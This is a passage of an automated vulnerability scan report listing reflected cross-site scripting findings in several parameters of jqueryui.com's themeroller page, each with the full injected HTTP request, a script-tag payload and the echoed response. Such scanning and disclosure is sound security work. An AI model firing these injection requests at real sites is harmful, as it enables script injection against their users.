<a href="/download?themeParams=%3FffDefault%3DSegoe%2BUI%252C%2BArial%252C%2Bsans-serif%26fwDefault%3Dbold%26fsDefault%3D1.1em%26cornerRadius%3D8px%26bgColorHeader%3
...[SNIP]...
<input type="text" name="bgColorError" id="bgColorError" class="hex" value="d34d17744d6\\\"><script>alert(1)</script>05da56c372e" />
...[SNIP]...

1.134. http://jqueryui.com/themeroller/_rollyourown.php [bgColorHeader parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/_rollyourown.php

Issue detail

The value of the bgColorHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 27087"><script>alert(1)</script>4a1552b782e was submitted in the bgColorHeader parameter. This input was echoed as 27087\\\"><script>alert(1)</script>4a1552b782e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/_rollyourown.php?ffDefault=Segoe+UI%2C+Arial%2C+sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=8px&bgColorHeader=81786527087"><script>alert(1)</script>4a1552b782e&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=45&borderColorHeader=494437&fcHeader=ffffff&iconColorHeader=fadc7a&bgColorContent=feeebd&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=8e846b&fcContent=383838&iconColorContent=d19405&bgColorDefault=fece2f&bgTextureDefault=12_gloss_wave.png&bgImgOpacityDefault=60&borderColorDefault=d19405&fcDefault=4c3000&iconColorDefault=3d3d3d&bgColorHover=ffdd57&bgTextureHover=12_gloss_wave.png&bgImgOpacityHover=70&borderColorHover=a45b13&fcHover=381f00&iconColorHover=bd7b00&bgColorActive=ffffff&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=30&borderColorActive=655e4e&fcActive=0074c7&iconColorActive=eb990f&bgColorHighlight=fff9e5&bgTextureHighlight=12_gloss_wave.png&bgImgOpacityHighlight=90&borderColorHighlight=eeb420&fcHighlight=1f1f1f&iconColorHighlight=ed9f26&bgColorError=d34d17&bgTextureError=07_diagonals_medium.png&bgImgOpacityError=20&borderColorError=ffb73d&fcError=ffffff&iconColorError=ffe180&bgColorOverlay=5c5c5c&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=50&opacityOverlay=80&bgColorShadow=cccccc&bgTextureShadow=01_flat.png&bgImgOpacityShadow=30&opacityShadow=60&thicknessShadow=7px&offsetTopShadow=-7px&offsetLeftShadow=-7px&cornerRadiusShadow=8px HTTP/1.1
x-requested-with: XMLHttpRequest
Accept-Language: en-us
Referer: http://jqueryui.com/themeroller/#ffDefault=Segoe+UI%2C+Arial%2C+sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=8px&bgColorHeader=817865&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=45&borderColorHeader=494437&fcHeader=ffffff&iconColorHeader=fadc7a&bgColorContent=feeebd&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=8e846b&fcContent=383838&iconColorContent=d19405&bgColorDefault=fece2f&bgTextureDefault=12_gloss_wave.png&bgImgOpacityDefault=60&borderColorDefault=d19405&fcDefault=4c3000&iconColorDefault=3d3d3d&bgColorHover=ffdd57&bgTextureHover=12_gloss_wave.png&bgImgOpacityHover=70&borderColorHover=a45b13&fcHover=381f00&iconColorHover=bd7b00&bgColorActive=ffffff&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=30&borderColorActive=655e4e&fcActive=0074c7&iconColorActive=eb990f&bgColorHighlight=fff9e5&bgTextureHighlight=12_gloss_wave.png&bgImgOpacityHighlight=90&borderColorHighlight=eeb420&fcHighlight=1f1f1f&iconColorHighlight=ed9f26&bgColorError=d34d17&bgTextureError=07_diagonals_medium.png&bgImgOpacityError=20&borderColorError=ffb73d&fcError=ffffff&iconColorError=ffe180&bgColorOverlay=5c5c5c&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=50&opacityOverlay=80&bgColorShadow=cccccc&bgTextureShadow=01_flat.png&bgImgOpacityShadow=30&opacityShadow=60&thicknessShadow=7px&offsetTopShadow=-7px&offsetLeftShadow=-7px&cornerRadiusShadow=8px
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: jqueryui.com
Proxy-Connection: Keep-Alive
Cookie: __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmb=77982607.4.10.1289873280; __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmc=77982607

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:13:22 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 39552


<a href="/download?themeParams=%3FffDefault%3DSegoe%2BUI%252C%2BArial%252C%2Bsans-serif%26fwDefault%3Dbold%26fsDefault%3D1.1em%26cornerRadius%3D8px%26bgColorHeader%3
...[SNIP]...
<input type="text" name="bgColorHeader" id="bgColorHeader" class="hex" value="81786527087\\\"><script>alert(1)</script>4a1552b782e" />
...[SNIP]...

1.135. http://jqueryui.com/themeroller/_rollyourown.php [bgColorHighlight parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/_rollyourown.php

Issue detail

The value of the bgColorHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 33847"><script>alert(1)</script>d02cc6d9f2e was submitted in the bgColorHighlight parameter. This input was echoed as 33847\\\"><script>alert(1)</script>d02cc6d9f2e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/_rollyourown.php?ffDefault=Segoe+UI%2C+Arial%2C+sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=8px&bgColorHeader=817865&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=45&borderColorHeader=494437&fcHeader=ffffff&iconColorHeader=fadc7a&bgColorContent=feeebd&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=8e846b&fcContent=383838&iconColorContent=d19405&bgColorDefault=fece2f&bgTextureDefault=12_gloss_wave.png&bgImgOpacityDefault=60&borderColorDefault=d19405&fcDefault=4c3000&iconColorDefault=3d3d3d&bgColorHover=ffdd57&bgTextureHover=12_gloss_wave.png&bgImgOpacityHover=70&borderColorHover=a45b13&fcHover=381f00&iconColorHover=bd7b00&bgColorActive=ffffff&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=30&borderColorActive=655e4e&fcActive=0074c7&iconColorActive=eb990f&bgColorHighlight=fff9e533847"><script>alert(1)</script>d02cc6d9f2e&bgTextureHighlight=12_gloss_wave.png&bgImgOpacityHighlight=90&borderColorHighlight=eeb420&fcHighlight=1f1f1f&iconColorHighlight=ed9f26&bgColorError=d34d17&bgTextureError=07_diagonals_medium.png&bgImgOpacityError=20&borderColorError=ffb73d&fcError=ffffff&iconColorError=ffe180&bgColorOverlay=5c5c5c&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=50&opacityOverlay=80&bgColorShadow=cccccc&bgTextureShadow=01_flat.png&bgImgOpacityShadow=30&opacityShadow=60&thicknessShadow=7px&offsetTopShadow=-7px&offsetLeftShadow=-7px&cornerRadiusShadow=8px HTTP/1.1
x-requested-with: XMLHttpRequest
Accept-Language: en-us
Referer: http://jqueryui.com/themeroller/#ffDefault=Segoe+UI%2C+Arial%2C+sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=8px&bgColorHeader=817865&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=45&borderColorHeader=494437&fcHeader=ffffff&iconColorHeader=fadc7a&bgColorContent=feeebd&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=8e846b&fcContent=383838&iconColorContent=d19405&bgColorDefault=fece2f&bgTextureDefault=12_gloss_wave.png&bgImgOpacityDefault=60&borderColorDefault=d19405&fcDefault=4c3000&iconColorDefault=3d3d3d&bgColorHover=ffdd57&bgTextureHover=12_gloss_wave.png&bgImgOpacityHover=70&borderColorHover=a45b13&fcHover=381f00&iconColorHover=bd7b00&bgColorActive=ffffff&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=30&borderColorActive=655e4e&fcActive=0074c7&iconColorActive=eb990f&bgColorHighlight=fff9e5&bgTextureHighlight=12_gloss_wave.png&bgImgOpacityHighlight=90&borderColorHighlight=eeb420&fcHighlight=1f1f1f&iconColorHighlight=ed9f26&bgColorError=d34d17&bgTextureError=07_diagonals_medium.png&bgImgOpacityError=20&borderColorError=ffb73d&fcError=ffffff&iconColorError=ffe180&bgColorOverlay=5c5c5c&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=50&opacityOverlay=80&bgColorShadow=cccccc&bgTextureShadow=01_flat.png&bgImgOpacityShadow=30&opacityShadow=60&thicknessShadow=7px&offsetTopShadow=-7px&offsetLeftShadow=-7px&cornerRadiusShadow=8px
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: jqueryui.com
Proxy-Connection: Keep-Alive
Cookie: __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmb=77982607.4.10.1289873280; __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmc=77982607

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:13:41 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 39552


<a href="/download?themeParams=%3FffDefault%3DSegoe%2BUI%252C%2BArial%252C%2Bsans-serif%26fwDefault%3Dbold%26fsDefault%3D1.1em%26cornerRadius%3D8px%26bgColorHeader%3
...[SNIP]...
<input type="text" name="bgColorHighlight" id="bgColorHighlight" class="hex" value="fff9e533847\\\"><script>alert(1)</script>d02cc6d9f2e" />
...[SNIP]...

1.136. http://jqueryui.com/themeroller/_rollyourown.php [bgColorHover parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/_rollyourown.php

Issue detail

The value of the bgColorHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload de2ea"><script>alert(1)</script>67e64d9d206 was submitted in the bgColorHover parameter. This input was echoed as de2ea\\\"><script>alert(1)</script>67e64d9d206 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/_rollyourown.php?ffDefault=Segoe+UI%2C+Arial%2C+sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=8px&bgColorHeader=817865&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=45&borderColorHeader=494437&fcHeader=ffffff&iconColorHeader=fadc7a&bgColorContent=feeebd&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=8e846b&fcContent=383838&iconColorContent=d19405&bgColorDefault=fece2f&bgTextureDefault=12_gloss_wave.png&bgImgOpacityDefault=60&borderColorDefault=d19405&fcDefault=4c3000&iconColorDefault=3d3d3d&bgColorHover=ffdd57de2ea"><script>alert(1)</script>67e64d9d206&bgTextureHover=12_gloss_wave.png&bgImgOpacityHover=70&borderColorHover=a45b13&fcHover=381f00&iconColorHover=bd7b00&bgColorActive=ffffff&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=30&borderColorActive=655e4e&fcActive=0074c7&iconColorActive=eb990f&bgColorHighlight=fff9e5&bgTextureHighlight=12_gloss_wave.png&bgImgOpacityHighlight=90&borderColorHighlight=eeb420&fcHighlight=1f1f1f&iconColorHighlight=ed9f26&bgColorError=d34d17&bgTextureError=07_diagonals_medium.png&bgImgOpacityError=20&borderColorError=ffb73d&fcError=ffffff&iconColorError=ffe180&bgColorOverlay=5c5c5c&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=50&opacityOverlay=80&bgColorShadow=cccccc&bgTextureShadow=01_flat.png&bgImgOpacityShadow=30&opacityShadow=60&thicknessShadow=7px&offsetTopShadow=-7px&offsetLeftShadow=-7px&cornerRadiusShadow=8px HTTP/1.1
x-requested-with: XMLHttpRequest
Accept-Language: en-us
Referer: http://jqueryui.com/themeroller/#ffDefault=Segoe+UI%2C+Arial%2C+sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=8px&bgColorHeader=817865&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=45&borderColorHeader=494437&fcHeader=ffffff&iconColorHeader=fadc7a&bgColorContent=feeebd&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=8e846b&fcContent=383838&iconColorContent=d19405&bgColorDefault=fece2f&bgTextureDefault=12_gloss_wave.png&bgImgOpacityDefault=60&borderColorDefault=d19405&fcDefault=4c3000&iconColorDefault=3d3d3d&bgColorHover=ffdd57&bgTextureHover=12_gloss_wave.png&bgImgOpacityHover=70&borderColorHover=a45b13&fcHover=381f00&iconColorHover=bd7b00&bgColorActive=ffffff&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=30&borderColorActive=655e4e&fcActive=0074c7&iconColorActive=eb990f&bgColorHighlight=fff9e5&bgTextureHighlight=12_gloss_wave.png&bgImgOpacityHighlight=90&borderColorHighlight=eeb420&fcHighlight=1f1f1f&iconColorHighlight=ed9f26&bgColorError=d34d17&bgTextureError=07_diagonals_medium.png&bgImgOpacityError=20&borderColorError=ffb73d&fcError=ffffff&iconColorError=ffe180&bgColorOverlay=5c5c5c&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=50&opacityOverlay=80&bgColorShadow=cccccc&bgTextureShadow=01_flat.png&bgImgOpacityShadow=30&opacityShadow=60&thicknessShadow=7px&offsetTopShadow=-7px&offsetLeftShadow=-7px&cornerRadiusShadow=8px
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: jqueryui.com
Proxy-Connection: Keep-Alive
Cookie: __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmb=77982607.4.10.1289873280; __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmc=77982607

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:13:32 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 39552


<a href="/download?themeParams=%3FffDefault%3DSegoe%2BUI%252C%2BArial%252C%2Bsans-serif%26fwDefault%3Dbold%26fsDefault%3D1.1em%26cornerRadius%3D8px%26bgColorHeader%3
...[SNIP]...
<input type="text" name="bgColorHover" id="bgColorHover" class="hex" value="ffdd57de2ea\\\"><script>alert(1)</script>67e64d9d206" />
...[SNIP]...

1.137. http://jqueryui.com/themeroller/_rollyourown.php [bgColorOverlay parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/_rollyourown.php

Issue detail

The value of the bgColorOverlay request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 782ad"><script>alert(1)</script>acf6ffbe106 was submitted in the bgColorOverlay parameter. This input was echoed as 782ad\\\"><script>alert(1)</script>acf6ffbe106 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/_rollyourown.php?ffDefault=Segoe+UI%2C+Arial%2C+sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=8px&bgColorHeader=817865&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=45&borderColorHeader=494437&fcHeader=ffffff&iconColorHeader=fadc7a&bgColorContent=feeebd&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=8e846b&fcContent=383838&iconColorContent=d19405&bgColorDefault=fece2f&bgTextureDefault=12_gloss_wave.png&bgImgOpacityDefault=60&borderColorDefault=d19405&fcDefault=4c3000&iconColorDefault=3d3d3d&bgColorHover=ffdd57&bgTextureHover=12_gloss_wave.png&bgImgOpacityHover=70&borderColorHover=a45b13&fcHover=381f00&iconColorHover=bd7b00&bgColorActive=ffffff&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=30&borderColorActive=655e4e&fcActive=0074c7&iconColorActive=eb990f&bgColorHighlight=fff9e5&bgTextureHighlight=12_gloss_wave.png&bgImgOpacityHighlight=90&borderColorHighlight=eeb420&fcHighlight=1f1f1f&iconColorHighlight=ed9f26&bgColorError=d34d17&bgTextureError=07_diagonals_medium.png&bgImgOpacityError=20&borderColorError=ffb73d&fcError=ffffff&iconColorError=ffe180&bgColorOverlay=5c5c5c782ad"><script>alert(1)</script>acf6ffbe106&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=50&opacityOverlay=80&bgColorShadow=cccccc&bgTextureShadow=01_flat.png&bgImgOpacityShadow=30&opacityShadow=60&thicknessShadow=7px&offsetTopShadow=-7px&offsetLeftShadow=-7px&cornerRadiusShadow=8px HTTP/1.1
x-requested-with: XMLHttpRequest
Accept-Language: en-us
Referer: http://jqueryui.com/themeroller/#ffDefault=Segoe+UI%2C+Arial%2C+sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=8px&bgColorHeader=817865&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=45&borderColorHeader=494437&fcHeader=ffffff&iconColorHeader=fadc7a&bgColorContent=feeebd&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=8e846b&fcContent=383838&iconColorContent=d19405&bgColorDefault=fece2f&bgTextureDefault=12_gloss_wave.png&bgImgOpacityDefault=60&borderColorDefault=d19405&fcDefault=4c3000&iconColorDefault=3d3d3d&bgColorHover=ffdd57&bgTextureHover=12_gloss_wave.png&bgImgOpacityHover=70&borderColorHover=a45b13&fcHover=381f00&iconColorHover=bd7b00&bgColorActive=ffffff&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=30&borderColorActive=655e4e&fcActive=0074c7&iconColorActive=eb990f&bgColorHighlight=fff9e5&bgTextureHighlight=12_gloss_wave.png&bgImgOpacityHighlight=90&borderColorHighlight=eeb420&fcHighlight=1f1f1f&iconColorHighlight=ed9f26&bgColorError=d34d17&bgTextureError=07_diagonals_medium.png&bgImgOpacityError=20&borderColorError=ffb73d&fcError=ffffff&iconColorError=ffe180&bgColorOverlay=5c5c5c&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=50&opacityOverlay=80&bgColorShadow=cccccc&bgTextureShadow=01_flat.png&bgImgOpacityShadow=30&opacityShadow=60&thicknessShadow=7px&offsetTopShadow=-7px&offsetLeftShadow=-7px&cornerRadiusShadow=8px
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: jqueryui.com
Proxy-Connection: Keep-Alive
Cookie: __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmb=77982607.4.10.1289873280; __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmc=77982607

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:13:48 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 39552


<a href="/download?themeParams=%3FffDefault%3DSegoe%2BUI%252C%2BArial%252C%2Bsans-serif%26fwDefault%3Dbold%26fsDefault%3D1.1em%26cornerRadius%3D8px%26bgColorHeader%3
...[SNIP]...
<input type="text" name="bgColorOverlay" id="bgColorOverlay" class="hex" value="5c5c5c782ad\\\"><script>alert(1)</script>acf6ffbe106" />
...[SNIP]...

1.138. http://jqueryui.com/themeroller/_rollyourown.php [bgColorShadow parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/_rollyourown.php

Issue detail

The value of the bgColorShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e1d32"><script>alert(1)</script>2deb2d37d2 was submitted in the bgColorShadow parameter. This input was echoed as e1d32\\\"><script>alert(1)</script>2deb2d37d2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/_rollyourown.php?ffDefault=Segoe+UI%2C+Arial%2C+sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=8px&bgColorHeader=817865&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=45&borderColorHeader=494437&fcHeader=ffffff&iconColorHeader=fadc7a&bgColorContent=feeebd&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=8e846b&fcContent=383838&iconColorContent=d19405&bgColorDefault=fece2f&bgTextureDefault=12_gloss_wave.png&bgImgOpacityDefault=60&borderColorDefault=d19405&fcDefault=4c3000&iconColorDefault=3d3d3d&bgColorHover=ffdd57&bgTextureHover=12_gloss_wave.png&bgImgOpacityHover=70&borderColorHover=a45b13&fcHover=381f00&iconColorHover=bd7b00&bgColorActive=ffffff&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=30&borderColorActive=655e4e&fcActive=0074c7&iconColorActive=eb990f&bgColorHighlight=fff9e5&bgTextureHighlight=12_gloss_wave.png&bgImgOpacityHighlight=90&borderColorHighlight=eeb420&fcHighlight=1f1f1f&iconColorHighlight=ed9f26&bgColorError=d34d17&bgTextureError=07_diagonals_medium.png&bgImgOpacityError=20&borderColorError=ffb73d&fcError=ffffff&iconColorError=ffe180&bgColorOverlay=5c5c5c&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=50&opacityOverlay=80&bgColorShadow=cccccce1d32"><script>alert(1)</script>2deb2d37d2&bgTextureShadow=01_flat.png&bgImgOpacityShadow=30&opacityShadow=60&thicknessShadow=7px&offsetTopShadow=-7px&offsetLeftShadow=-7px&cornerRadiusShadow=8px HTTP/1.1
x-requested-with: XMLHttpRequest
Accept-Language: en-us
Referer: http://jqueryui.com/themeroller/#ffDefault=Segoe+UI%2C+Arial%2C+sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=8px&bgColorHeader=817865&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=45&borderColorHeader=494437&fcHeader=ffffff&iconColorHeader=fadc7a&bgColorContent=feeebd&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=8e846b&fcContent=383838&iconColorContent=d19405&bgColorDefault=fece2f&bgTextureDefault=12_gloss_wave.png&bgImgOpacityDefault=60&borderColorDefault=d19405&fcDefault=4c3000&iconColorDefault=3d3d3d&bgColorHover=ffdd57&bgTextureHover=12_gloss_wave.png&bgImgOpacityHover=70&borderColorHover=a45b13&fcHover=381f00&iconColorHover=bd7b00&bgColorActive=ffffff&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=30&borderColorActive=655e4e&fcActive=0074c7&iconColorActive=eb990f&bgColorHighlight=fff9e5&bgTextureHighlight=12_gloss_wave.png&bgImgOpacityHighlight=90&borderColorHighlight=eeb420&fcHighlight=1f1f1f&iconColorHighlight=ed9f26&bgColorError=d34d17&bgTextureError=07_diagonals_medium.png&bgImgOpacityError=20&borderColorError=ffb73d&fcError=ffffff&iconColorError=ffe180&bgColorOverlay=5c5c5c&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=50&opacityOverlay=80&bgColorShadow=cccccc&bgTextureShadow=01_flat.png&bgImgOpacityShadow=30&opacityShadow=60&thicknessShadow=7px&offsetTopShadow=-7px&offsetLeftShadow=-7px&cornerRadiusShadow=8px
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: jqueryui.com
Proxy-Connection: Keep-Alive
Cookie: __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmb=77982607.4.10.1289873280; __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmc=77982607

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:13:50 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 39550


<a href="/download?themeParams=%3FffDefault%3DSegoe%2BUI%252C%2BArial%252C%2Bsans-serif%26fwDefault%3Dbold%26fsDefault%3D1.1em%26cornerRadius%3D8px%26bgColorHeader%3
...[SNIP]...
<input type="text" name="bgColorShadow" id="bgColorShadow" class="hex" value="cccccce1d32\\\"><script>alert(1)</script>2deb2d37d2" />
...[SNIP]...

1.139. http://jqueryui.com/themeroller/_rollyourown.php [bgImgOpacityActive parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/_rollyourown.php

Issue detail

The value of the bgImgOpacityActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ebd8c"><script>alert(1)</script>8dfbc90f084 was submitted in the bgImgOpacityActive parameter. This input was echoed as ebd8c\\\"><script>alert(1)</script>8dfbc90f084 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/_rollyourown.php?ffDefault=Segoe+UI%2C+Arial%2C+sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=8px&bgColorHeader=817865&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=45&borderColorHeader=494437&fcHeader=ffffff&iconColorHeader=fadc7a&bgColorContent=feeebd&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=8e846b&fcContent=383838&iconColorContent=d19405&bgColorDefault=fece2f&bgTextureDefault=12_gloss_wave.png&bgImgOpacityDefault=60&borderColorDefault=d19405&fcDefault=4c3000&iconColorDefault=3d3d3d&bgColorHover=ffdd57&bgTextureHover=12_gloss_wave.png&bgImgOpacityHover=70&borderColorHover=a45b13&fcHover=381f00&iconColorHover=bd7b00&bgColorActive=ffffff&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=30ebd8c"><script>alert(1)</script>8dfbc90f084&borderColorActive=655e4e&fcActive=0074c7&iconColorActive=eb990f&bgColorHighlight=fff9e5&bgTextureHighlight=12_gloss_wave.png&bgImgOpacityHighlight=90&borderColorHighlight=eeb420&fcHighlight=1f1f1f&iconColorHighlight=ed9f26&bgColorError=d34d17&bgTextureError=07_diagonals_medium.png&bgImgOpacityError=20&borderColorError=ffb73d&fcError=ffffff&iconColorError=ffe180&bgColorOverlay=5c5c5c&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=50&opacityOverlay=80&bgColorShadow=cccccc&bgTextureShadow=01_flat.png&bgImgOpacityShadow=30&opacityShadow=60&thicknessShadow=7px&offsetTopShadow=-7px&offsetLeftShadow=-7px&cornerRadiusShadow=8px HTTP/1.1
x-requested-with: XMLHttpRequest
Accept-Language: en-us
Referer: http://jqueryui.com/themeroller/#ffDefault=Segoe+UI%2C+Arial%2C+sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=8px&bgColorHeader=817865&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=45&borderColorHeader=494437&fcHeader=ffffff&iconColorHeader=fadc7a&bgColorContent=feeebd&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=8e846b&fcContent=383838&iconColorContent=d19405&bgColorDefault=fece2f&bgTextureDefault=12_gloss_wave.png&bgImgOpacityDefault=60&borderColorDefault=d19405&fcDefault=4c3000&iconColorDefault=3d3d3d&bgColorHover=ffdd57&bgTextureHover=12_gloss_wave.png&bgImgOpacityHover=70&borderColorHover=a45b13&fcHover=381f00&iconColorHover=bd7b00&bgColorActive=ffffff&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=30&borderColorActive=655e4e&fcActive=0074c7&iconColorActive=eb990f&bgColorHighlight=fff9e5&bgTextureHighlight=12_gloss_wave.png&bgImgOpacityHighlight=90&borderColorHighlight=eeb420&fcHighlight=1f1f1f&iconColorHighlight=ed9f26&bgColorError=d34d17&bgTextureError=07_diagonals_medium.png&bgImgOpacityError=20&borderColorError=ffb73d&fcError=ffffff&iconColorError=ffe180&bgColorOverlay=5c5c5c&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=50&opacityOverlay=80&bgColorShadow=cccccc&bgTextureShadow=01_flat.png&bgImgOpacityShadow=30&opacityShadow=60&thicknessShadow=7px&offsetTopShadow=-7px&offsetLeftShadow=-7px&cornerRadiusShadow=8px
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: jqueryui.com
Proxy-Connection: Keep-Alive
